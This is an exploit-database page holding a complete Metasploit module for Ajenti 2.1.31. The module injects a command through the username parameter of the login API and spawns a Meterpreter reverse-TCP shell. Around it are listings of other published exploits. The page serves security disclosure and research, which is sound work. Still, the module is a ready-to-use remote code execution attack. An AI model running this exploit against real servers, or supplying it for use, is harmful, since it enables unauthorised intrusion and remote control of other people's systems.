Menu

Search for hundreds of thousands of exploits

"Ajenti 2.1.31 - Remote Code Exection (Metasploit)"

Author

Exploit author

"Onur ER"

Platform

Exploit platform

json

Release date

Exploit published date

2019-10-30

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
# Exploit Title: Ajenti 2.1.31 - Remote Code Exection (Metasploit)
# Date: 2019-10-29
# Exploit Author: Onur ER
# Vendor Homepage: http://ajenti.org/
# Software Link: https://github.com/ajenti/ajenti
# Version: 2.1.31
# Tested on: Ubuntu 19.10

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
                      'Name'            => "Ajenti 2.1.31 Remote Code Execution",
                      'Description'     => %q{
                        This module exploits a command injection in Ajenti <= 2.1.31.
                        By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.
                      },
                      'Author'          => [
                          'Jeremy Brown', # Vulnerability discovery
                          'Onur ER <onur@onurer.net>' # Metasploit module
                      ],
                      'References'      => [
                          ['EDB', '47497']
                      ],
                      'DisclosureDate'  => '2019-10-14',
                      'License'         => MSF_LICENSE,
                      'Platform'        => 'python',
                      'Arch'            => ARCH_PYTHON,
                      'Privileged'      => false,
                      'Targets'         => [
                          [ 'Ajenti <= 2.1.31', {} ]
                      ],
                      'DefaultOptions'  =>
                          {
                              'RPORT'   => 8000,
                              'SSL'     => 'True',
                              'payload' => 'python/meterpreter/reverse_tcp'
                          },
                      'DefaultTarget'   => 0
          ))
    register_options([
                         OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    res = send_request_cgi({
                               'method' => 'GET',
                               'uri'    => "/view/login/normal"
                           })
    if res and res.code == 200
      if res.body =~ /'ajentiVersion', '2.1.31'/
        return Exploit::CheckCode::Vulnerable
      elsif res.body =~ /Ajenti/
        return Exploit::CheckCode::Detected
      end
    end
    vprint_error("Unable to determine due to a HTTP connection timeout")
    return Exploit::CheckCode::Unknown
  end


  def exploit
    print_status("Exploiting...")
    random_password = rand_text_alpha_lower(7)
    json_body = { 'username' => "`python -c \"#{payload.encoded}\"`",
                  'password' => random_password,
                  'mode' => 'normal'
    }
    res = send_request_cgi({
         'method' => 'POST',
         'uri'    => normalize_uri(target_uri, 'api', 'core', 'auth'),
         'ctype'  => 'application/json',
         'data'   => JSON.generate(json_body)
     })
  end
end
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-10-09 "openMAINT 1.1-2.4.2 - Arbitrary File Upload" webapps json mrb3n
2020-10-06 "EasyPMS 1.0.0 - Authentication Bypass" webapps json Jok3r
2020-04-21 "NSClient++ 0.5.2.35 - Authenticated Remote Code Execution" webapps json kindredsec
2020-02-05 "AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)" webapps json "Ihsan Sencan"
2020-02-05 "AVideo Platform 8.1 - Information Disclosure (User Enumeration)" webapps json "Ihsan Sencan"
2020-02-05 "Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)" webapps json nxkennedy
2019-10-30 "Ajenti 2.1.31 - Remote Code Exection (Metasploit)" webapps json "Onur ER"
2019-09-25 "NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution" webapps json "Semen Alexandrovich Lyhin"
2018-11-05 "Royal TS/X - Information Disclosure" webapps json "Jakub Palaczynski"
2018-04-09 "CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution" webapps json "RedTeam Pentesting"
Release Date Title Type Platform Author
2019-12-12 "OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)" webapps php "Onur ER"
2019-10-30 "Ajenti 2.1.31 - Remote Code Exection (Metasploit)" webapps json "Onur ER" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected